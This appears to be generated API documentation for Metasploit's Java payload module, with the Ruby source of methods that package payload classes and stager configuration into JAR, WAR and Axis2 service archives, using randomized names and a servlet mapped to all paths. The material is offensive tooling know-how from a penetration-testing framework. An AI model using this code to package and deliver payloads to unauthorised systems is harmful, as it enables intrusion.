Module: Msf::Payload::Java

Included in:

BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp

Defined in:

lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Constant Summary

ForceDynamicCachedSize =

Mark the payload as dynamic as the generated JAR/zip files can differ in size depending on the host machine’s zlib version

true

Instance Method Summary

• #class_files ⇒ Object

  Default to no extra class files.

• #generate(opts = {}) ⇒ Object

  Used by stagers to construct the payload jar file as a String.

• #generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

  Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar.

• #generate_default_stage(opts = {}) ⇒ Object
• #generate_jar(opts = {}) ⇒ Rex::Zip::Jar

  Used by stagers to create a jar file as a Rex::Zip::Jar.

• #generate_stage(opts = {}) ⇒ Object

  Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/.

• #generate_war(opts = {}) ⇒ Object

  Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

• #stage_class_files ⇒ Object

  Default to no extra stage class files.

Instance Method Details

#class_files ⇒ Object

Default to no extra class files

# File 'lib/msf/core/payload/java.rb', line 173

def class_files
  []
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String

# File 'lib/msf/core/payload/java.rb', line 37

def generate(opts={})
  generate_jar(opts).pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload’s #stager_config method.

Parameters:

• :app_name (Hash) —

  a customizable set of options

Returns:

• (Rex::Zip::Jar)

# File 'lib/msf/core/payload/java.rb', line 136

def generate_axis2(opts={})
  raise if not respond_to? :stager_config

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file(path_parts.join('/'), contents)
  end

  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end

#generate_default_stage(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/java.rb', line 23

def generate_default_stage(opts={})
  stage = ''
  stage_class_files.each do |path|
    data = MetasploitPayloads.read('java', path)
    stage << [data.length, data].pack('NA*')
  end
  stage << [0].pack('N')

  stage
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload’s #stager_config method.

Parameters:

• opts (Hash) (defaults to: {}) —

  a customizable set of options

Options Hash (opts):

• :main_class (String) —

  the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

• :random (Boolean) —

  Set to 'true` to randomize the "metasploit" package name.

Returns:

• (Rex::Zip::Jar)

# File 'lib/msf/core/payload/java.rb', line 51

def generate_jar(opts={})
  raise if not respond_to? :stager_config
  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    jar.add_file(path_parts.join('/'), contents)
  end

  jar.build_manifest(:main_class => main_class)

  jar
end

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

32-bit big endian length ][ first raw .class file

…

32-bit big endian length ][ Nth raw .class file

32-bit null

# File 'lib/msf/core/payload/java.rb', line 19

def generate_stage(opts={})
  generate_default_stage(opts)
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

• opts (Hash) (defaults to: {})
• :app_name (Hash) —

  a customizable set of options

# File 'lib/msf/core/payload/java.rb', line 85

def generate_war(opts={})
  raise if not respond_to? :stager_config
  zip = Rex::Zip::Jar.new

  web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  web_xml.gsub!('NAME', app_name)

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_file('WEB-INF/classes/metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file("WEB-INF/classes/" + path_parts.join('/'), contents)
  end

  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end

#stage_class_files ⇒ Object

Default to no extra stage class files

# File 'lib/msf/core/payload/java.rb', line 178

def stage_class_files
  []
end